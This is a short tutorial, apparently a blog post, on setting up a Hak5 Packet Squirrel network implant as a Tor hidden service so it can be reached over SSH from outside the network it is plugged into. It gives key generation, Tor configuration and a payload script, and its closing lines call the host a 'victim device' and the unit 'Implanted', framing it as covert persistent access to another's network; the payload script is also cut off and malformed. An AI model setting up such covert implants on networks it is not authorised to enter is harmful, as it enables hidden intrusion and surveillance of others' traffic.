Hak5 Packet Squirrel is actually more capable than most “Reviews” let you think.

What to do, if you need to access it outside NAT, but don’t want to setup your own VPN server, where Packet Squirrel can call back? You set it up as TOR hidden service and access it with SSH.

First things first - generate new ssh keys for Packet Squirrel.

ssh-keygen -f /etc/ssh/ssh_host_rsa_key -N '' -t rsa
ssh-keygen -f /etc/ssh/ssh_host_dsa_key -N '' -t dsa

Change root password.

If you want to disable password login completely configure SSH server to reject password login.
Make sure, key based auth works, and then disable password auth for SSH.

echo "PasswordAuthentication no" >> /etc/ssh/sshd_config

Now lets install TOR

opkg update
opkg install tor

Configure TOR to use port 443 for outgoing traffic and define hidden_service. If you intend to leave the Squirrel for longer time on network, you should also use HidServAuth and HiddenServiceAuthorizeClient to limit access - you are NOT alone in the Onion network.


RunAsDaemon 1
DataDirectory /var/lib/tor
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 22
User tor
ReachableAddresses *:443
ReachableAddresses reject *:*

Now run the TOR service first time

/etc/init.d/tor restart

Now after running TOR service you have your hidden service hostname and private key under /var/lib/tor/hidden_service. Copy them to payload folder, because we need to recreate them at boot

cp -r /var/lib/tor/hidden_service /root/payloads/switch1

Now lets make payload script

We are configuring TOR under payload nr 1.
Set NETMODE to BRIDGE, this way it doesn’t break anything when plugged between network and network device


function setup() {
        # Show SETUP LED
        LED SETUP

        # Set the network mode to NAT
        sleep 5

        # TOR config
        cp -r /root/payloads/switch1/hidden_service /var/lib/tor/
        chown tor:tor /var/lib/tor/hidden_service -R
        chmod 0700 /var/lib/tor/hidden_service

        # start services
        /etc/init.d/sshd restart
        /etc/init.d/tor restart

        # disable LAN access
        iptables -A INPUT -i br-lan -p tcp --dport 22 -j DROP
        iptables -A INPUT -i br-lan -p tcp --dport 53 -j DROP

function run() {
        # Show  ATTACK LED
        LED Y SOLID


Flip mode switch to position 1 and reboot the Packet Squirrel.
Login via Onion network.

# torify ssh root@43guricsaz6a4k4z.onion

BusyBox v1.23.2 (2018-09-27 06:21:55 UTC) built-in shell (ash)

    __ (\\_          Packet Squirrel          _//) __
   (_ \( '.)             by Hak5             (.' )/ _)
     ) \ _))     _                     __    ((_ / (
    (_   )_     (') Nuts for Networks ((')    _(   _)


Wifi will be limited to 100Mbit/s, but it’s slow anyway :) Notice, how you can use victim device as USB power source. Implanted